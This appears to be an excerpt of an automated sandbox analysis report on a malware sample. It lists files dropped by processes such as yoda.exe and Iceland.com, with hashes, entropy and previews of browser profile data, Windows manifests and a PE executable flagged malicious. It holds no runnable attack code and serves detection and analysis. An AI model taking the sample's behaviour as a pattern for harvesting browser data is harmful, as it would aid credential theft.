                                                                                                                                                                                                                                                              SSDEEP:48:22e8T8PvMu0846PYPvJ8+F9gUUL0VlxfMUIgPdunPduZJ0gPdunPduZQ/+lx3cCQ:22X8PvMu0LtPvJPF+0VlVO0z60w+lfah
                                                                                                                                                                                                                                                              MD5:C7E301D9DD77A21C1CDBD73A63AF205C
                                                                                                                                                                                                                                                              SHA1:715D25AA0C06B2AD162F52A8DE06FB5040C389B1
                                                                                                                                                                                                                                                              SHA-256:239C9A49ACDA9FC9845B87819A33D07F359803153FEFFE4D2212989F82DE71E1
                                                                                                                                                                                                                                                              SHA-512:B0E6FFB10EF5EB9EB433A23803591C84F603779306E78B1648374218A50D2F77E8EE7215615E9D1BE033A96B735321FCA9D5F7B0CB65661674346FC1546E43FE
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="jeffspel".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:04:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:39:02.9208750-08:00".. manifestVersion="1.0".. owners="jeffspel".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-Crypto-keys-DL".. processorArchitecture="*".. publicKeyToken="$(Build.WindowsPublicKeyToken)".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. xmlns="".. scope="Upgrade,MigWiz,USMT".. >.. <migXml xmlns="">.. Check as this is only valid for down-level OS < t
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):126976
                                                                                                                                                                                                                                                              Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                                                                              MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                                                                              SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                                                                              SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                                                                              SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                                                                              Malicious:false
Preview:SQLite format 3...
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):4533
                                                                                                                                                                                                                                                              Entropy (8bit):5.1021772201912805
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:96:22X8PvMu0jPvJPM0UJl1/Qi9XexcElVOaBIpgmQlwYBwkbsgobVu:MUnZUb1xXMV37BhgVu
                                                                                                                                                                                                                                                              MD5:477F010FDB6BD5E5E57D6DEC5449F2FB
                                                                                                                                                                                                                                                              SHA1:73F9C03AF35B29EC2404BB70FEDC8C9ADADE74F6
                                                                                                                                                                                                                                                              SHA-256:2DBEDD5D4D6645E9ED45563FDB1DC42387EF24C9CF5D6A08EC3BE448073C4696
                                                                                                                                                                                                                                                              SHA-512:3C630BE96FC7FCD0036D254BA4D197AB31F37F6DAC411F8C78E624B0501D0205AF36CD5A29EC98D96D5D8D88EF2DBB2DF3A62C6F658A93302ECA500B8EC74F2F
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="jeffspel".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:05:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:41:02.9208750-08:00".. manifestVersion="1.0".. owners="jeffspel".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-dpapi-keys-DL".. processorArchitecture="*".. publicKeyToken="".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. xmlns="".. scope="Upgrade,MigWiz,USMT".. >.. <machineSpecific>.. <migXml>.. Check as this is only valid for down-level OS < than Windows V
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):2062
                                                                                                                                                                                                                                                              Entropy (8bit):4.925445222257812
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:48:227+9gUKl+lxFcCY4/YBu4yTy3opyLyXyoyOyzylpjyA:22Sw+lxaWm3uCL9Gv
                                                                                                                                                                                                                                                              MD5:60145F68B1CF9440FA663820AE11CE4B
                                                                                                                                                                                                                                                              SHA1:10195A2926015E3024D769673E004AA60DFEC0A3
                                                                                                                                                                                                                                                              SHA-256:4805E01EB0C9B3DFEB6B754D4148588E2FB798734D9EDE20E53EB8E75158B64F
                                                                                                                                                                                                                                                              SHA-512:55D088040D25D4CBFF5A4210A85107666E628C67CA3134B0C836E135DBFE82AA4FA70185993E99D951307F7D159C1428B390727DA17EFEC5AA4BE9D799B96895
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="*".. name="Microsoft-Windows-Kerberos-Key-Distribution-Center-DL".. processorArchitecture="*".. publicKeyToken="$(Build.WindowsPublicKeyToken)".. version="0.0.0.0".. />.. <migration>.. <machineSpecific>.. <migXml xmlns="">.. Check as this is only valid for down-level OS < than Windows Vista ? -->.. <detects>.. <detect>.. <condition>MigXmlHelper.IsOSEarlierThan("NT", "6.0.0.0")</condition>.. </detect>.. </detects>.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\kdc\* [*]</pattern>.. </objectSet>.. </include>.. <exclude>.. <objectSet>.. <pattern type="Reg
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):114688
                                                                                                                                                                                                                                                              Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1941
                                                                                                                                                                                                                                                              Entropy (8bit):4.861537145678193
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:48:22e8v+phDgrcHreIg/0xJ9U3C0gcj0kqIg/0xJuX:22CphPHyx0ruS0N0kqx0rQ
                                                                                                                                                                                                                                                              MD5:6F0056EC818D4FC20158F3FF190D6D6A
                                                                                                                                                                                                                                                              SHA1:9E2108FE560CC2187395C5EED011559D201CE45D
                                                                                                                                                                                                                                                              SHA-256:2F9596801DBE57D73C292BE4F93BD0C05F6D0A44C7A45F5F03FDBE35993B7DEC
                                                                                                                                                                                                                                                              SHA-512:72C193919EC4402D430CCBCC4F9A9B25DC9AAECBCCAEE666EFE20DA4133964D2382F1090EEB8FB0A3073ACAA7825AF7A62B59447D29F912A19BD4C04CDDF1AD1
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="neutral".. name="Microsoft-CertificateAuthority-Enrollment-ServerUpgrade".. processorArchitecture="*".. version="1.0.0.0".. versionScope="nonSxS".. />.. <migration.. alwaysProcess="yes".. replacementSettingsVersionRange="0".. replacementVersionRange="6.1.*".. settingsVersion="0".. >.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\Software\Microsoft\ADCS\CES [ConfigurationStatus]</pattern>.. </objectSet>.. </include>.. </rules>.. <rules context="System">.. <detects>.. <detect>.. Detection of CES. -
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):49152
                                                                                                                                                                                                                                                              Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):8193
                                                                                                                                                                                                                                                              Entropy (8bit):5.027484893998515
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:96:WNPERXr2q6QOOzJMk67cY8GrPVYRjDjXK2FJpjjsjwjZjj6OzJMk67cY8GrPVYRM:a2gwP625sQ9jsw902I
                                                                                                                                                                                                                                                              MD5:2D6ACF2AEC5E5349B16581C8AE23BF3E
                                                                                                                                                                                                                                                              SHA1:0AA7B29E8F13EB16F3DFC503D4E8CC55424ECB15
                                                                                                                                                                                                                                                              SHA-256:B48F54A1F8A4C3A25D7E0FBCB95BF2C825C89ACD9C80EBACE8C15681912EDEA2
                                                                                                                                                                                                                                                              SHA-512:7943AA852F34778B9197C34E6B6978FE51E0CDD2130167CB9C7C56D1B2B1272051EFE03DF3A21A12ECB9B9303DE0733E335CDE0BBBE1A1FC429E3323D335A1FE
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly>.. AuthUI has 3 different component names that matter in its migration story... The one that applies during the migration gather phase is as follows:.. Microsoft-Windows-Authentication-AuthUI: Vista and Win7.. Microsoft-Windows-Authentication-AuthUI-Component: Win8 (and beyond).. In order to support migration from Vista/Win7 to Win8, we update the Microsoft-Windows-Authentication-AuthUI component.. to gather in the MigWiz scope (in addition to the Upgrade scope, which it already supported)... -->.. <assemblyIdentity.. buildType="$(build.buildType)".. language="neutral".. name="Microsoft-Windows-Authentication-AuthUI".. processorArchitecture="*".. publicKeyToken="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration .. optimizePatterns="no".. offlineApply="no".. alwaysProcess="yes".. scope="MigWiz,
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):9571
                                                                                                                                                                                                                                                              Entropy (8bit):5.536643647658967
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                                                                                                                                                                                                              MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                                                                                                                                                                                                              SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                                                                                                                                                                                                              SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                                                                                                                                                                                                              SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                                                                                                              Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1787
                                                                                                                                                                                                                                                              Entropy (8bit):5.389067895342191
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:48:SfNaoCbLpTECb3fNaoCECOYfNaoCRCUfNaoC6kXG0UrU0U8C6kj:6NnCbLpTECbvNnCECOkNnCRCANnC6kX/
                                                                                                                                                                                                                                                              MD5:F99C44200CD63146D684576D8CD644F2
                                                                                                                                                                                                                                                              SHA1:27FBE2FA9457073FDD8D7C45E5196A0B903D5D42
                                                                                                                                                                                                                                                              SHA-256:6C674125229C8E60F70DA1B7E8AB320CC4D87F5677A208685632C4E8DD23BE9D
                                                                                                                                                                                                                                                              SHA-512:D947825C5CBD1A850B19370C0C31E41F622ADA0474CEEA88D35FEE950816D729E99D8B5BB56C87365CCC3294C09B73A4F46BF861BAD3B01BC88885B8E22DF1DB
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/A7319E937CB4FD2150BE4151BC37604A",.. "id": "A7319E937CB4FD2150BE4151BC37604A",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/A7319E937CB4FD2150BE4151BC37604A"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/181648D054685C363A3D3DD666DFAA5A",.. "id": "181648D054685C363A3D3DD666DFAA5A",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/181648D054685C363A3D3DD666DFAA5A"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              File Type:COM executable for DOS
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):280253
                                                                                                                                                                                                                                                              Entropy (8bit):7.999290755493679
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:6144:KvIP512rv/OaxzhAHzb+o/p0lENGXQVPu:C616/OVLWlEN8QNu
                                                                                                                                                                                                                                                              MD5:DCB63E0DAA1F10E37B1765C94317E960
                                                                                                                                                                                                                                                              SHA1:ABA56DDB75B5BE0CC9F6DD8781EBD352A78464FD
                                                                                                                                                                                                                                                              SHA-256:4AE6452A70EB3664BB35656040EB4E54DF016F1FCB5F1D31169F84AB854C9157
                                                                                                                                                                                                                                                              SHA-512:C07784B006E45FC36A5C6A95F2866FB514946744CAB72825C017DB972BEF2DA33123D2FE99FE61BF126E84D17020EC492AF2B92F884F35C2F4B3BEC81507F458
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                              Size (bytes):947288
                                                                                                                                                                                                                                                              Entropy (8bit):6.630612696399572
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                                                                                                              MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                              SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                                                                                                              SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                                                                                                              SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\yoda.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):100352
                                                                                                                                                                                                                                                              Entropy (8bit):6.2446902061366485
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3072:Cg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3Y:V5vPeDkjGgQaE/Y
                                                                                                                                                                                                                                                              MD5:1B4522B95D81397CA5A2210553445BBF
                                                                                                                                                                                                                                                              SHA1:9A91B54BE1C358C2EFE36119DA1A9A866C68379D
                                                                                                                                                                                                                                                              SHA-256:1BAC82F93DD185119FFF14EC929D0B9F6AF549985B6B76263F582EA79AC73EA8
                                                                                                                                                                                                                                                              SHA-512:E289FD7F59A35C1D94090A971463AA8F0B45CB24D29700D5B13BC564FC175235DE22E448C578BAC44E5FF114D89D0650455AD2A1BF669998776B306D0284508F
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\yoda.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):60416
                                                                                                                                                                                                                                                              Entropy (8bit):6.6948814947574045
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:1536:vkvyNf7Xw2U0pkzUWBh2zGc/xv5mjKu2IwNnPEBiqXv+5:MaW2UDQWf05mjccBiqXvK
                                                                                                                                                                                                                                                              MD5:4268C94743989D2335905A72A7BBDEC4
                                                                                                                                                                                                                                                              SHA1:72171D2F7D0AF48F3DCF54DC12E7A7E52D8D5213
                                                                                                                                                                                                                                                              SHA-256:39B58D7B0D2AA7782A2606F2062EE68445FD285714C81C650FCC3AE27954991B
                                                                                                                                                                                                                                                              SHA-512:0F3A3A13A801EA4EBA0931A1F1188C8F9CF026E439B9FFF8EE568079AF13CF6586BF68878581EB221BD35B33AA51BEDAF6A3C92891AFAD0E8E539FAB5062C683
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\yoda.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):139264
                                                                                                                                                                                                                                                              Entropy (8bit):5.6726042666483805
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:1536:PuVGHj1vtK7h6R8anHsWccd0vtmgMbFuz08QuklMBNIimuzaAwusPR:mq8QLeAg0Fuz08XvBNbjaAtsPR
                                                                                                                                                                                                                                                              MD5:D696BFE9F1FFE666DCB77F0E29521543
                                                                                                                                                                                                                                                              SHA1:C9107E51987522C3B19750177BC256196A3D5195
                                                                                                                                                                                                                                                              SHA-256:6F79CAA6B24CB7A63C6D8D4A44BECFB2BEA6442185BB9249128A450C6ABD6DF3
                                                                                                                                                                                                                                                              SHA-512:13C9167962106EBEB9D3823DA689370E82A30D66CF6EC241AEFB35D0D3D68917C42DC5F61CC076FC0AD4557176286E2CD03A030BACA022CF8D40A5C81783278B
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:R.O.G.R.E.S.S...G.U.I.C.T.R.L.C.R.E.A.T.E.T.R.E.E.V.I.E.W...G.U.I.C.T.R.L.C.R.E.A.T.E.G.R.A.P.H.I.C.....S.T.R.I.N.G.F.R.O.M.A.S.C.I.I.A.R.R.A.Y.....O.N.A.U.T.O.I.T.E.X.I.T.R.E.G.I.S.T.E.R.....G.U.I.C.T.R.L.C.R.E.A.T.E.T.A.B.I.T.E.M.....G.U.I.C.T.R.L.S.E.T.D.E.F.B.K.C.O.L.O.R.....I.N.I.R.E.A.D.S.E.C.T.I.O.N.N.A.M.E.S...G.U.I.C.T.R.L.C.R.E.A.T.E.B.U.T.T.O.N...D.L.L.C.A.L.L.B.A.C.K.R.E.G.I.S.T.E.R...G.U.I.C.T.R.L.C.R.E.A.T.E.U.P.D.O.W.N...G.U.I.C.T.R.L.C.R.E.A.T.E.S.L.I.D.E.R...S.T.R.I.N.G.R.E.G.E.X.P.R.E.P.L.A.C.E...O.B.J.C.R.E.A.T.E.I.N.T.E.R.F.A.C.E.....G.U.I.C.T.R.L.S.E.N.D.T.O.D.U.M.M.Y.....F.I.L.E.C.R.E.A.T.E.S.H.O.R.T.C.U.T.....G.U.I.C.T.R.L.C.R.E.A.T.E.I.N.P.U.T.....S.O.U.N.D.S.E.T.W.A.V.E.V.O.L.U.M.E.....F.I.L.E.C.R.E.A.T.E.N.T.F.S.L.I.N.K.....G.U.I.S.E.T.A.C.C.E.L.E.R.A.T.O.R.S.....G.U.I.C.T.R.L.C.R.E.A.T.E.C.O.M.B.O.....G.U.I.C.T.R.L.S.E.T.D.E.F.C.O.L.O.R.....P.R.O.C.E.S.S.S.E.T.P.R.I.O.R.I.T.Y.....G.U.I.C.T.R.L.S.E.T.R.E.S.I.Z.I.N.G.....S.T.R.I.N.G.T.O.A.S.C.I.I.A.R.R.A.Y.....
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\yoda.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):92160
                                                                                                                                                                                                                                                              Entropy (8bit):4.333762844539525
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:768:rKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R/OWel3EYr8qc/:rKaj6iTcPAsAhxjgarB/5el3EYr8
                                                                                                                                                                                                                                                              MD5:DB0EC43385F3DEEE406B5415CD6FA773
                                                                                                                                                                                                                                                              SHA1:AB2A645A996DE0A55B9C6923C98843578FD98ACF
                                                                                                                                                                                                                                                              SHA-256:E787120C432605763582DABE1B5EBDF05FE28C6A6A224709B0077CBF14E03EEE
                                                                                                                                                                                                                                                              SHA-512:CBF5E56BCBE7DB45192A7FFAB0CD9BE9C18D21BAA05FD25B2FAC0F9070F104030C47DE4D542A7E79BE6FB3ACFBC5E83F199353DF4E0A705D10A5864FA7731D2B
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\yoda.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):2532
                                                                                                                                                                                                                                                              Entropy (8bit):5.354250764303636
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:48:h9n9mTsCNvEQH5O5U1nPKrhBzM1FoMPhfq1koCqxLVJcd2u+K:LSEA5O5W+MfH5S1CqlVJcIg
                                                                                                                                                                                                                                                              MD5:6B02B5EE03B56BF046BC2774FF57620E
                                                                                                                                                                                                                                                              SHA1:8D6298FC56EBF7EFE5A667D82FD354AE72FF419A
                                                                                                                                                                                                                                                              SHA-256:AAB8F4CF127AD72978835377FF7F04107C766E0445F8DDB1D712D093C143D13A
                                                                                                                                                                                                                                                              SHA-512:606A7E949019032FD25D84E66B52DCF6151C500854F32D384C3F29DD04A9528ED4E71ABBFB793E79C8654DAAB0C3AB910F219C35E17A85D8FD0739AD7FF3C970
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\yoda.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):84992
                                                                                                                                                                                                                                                              Entropy (8bit):7.997648763107784
                                                                                                                                                                                                                                                              Encrypted:true
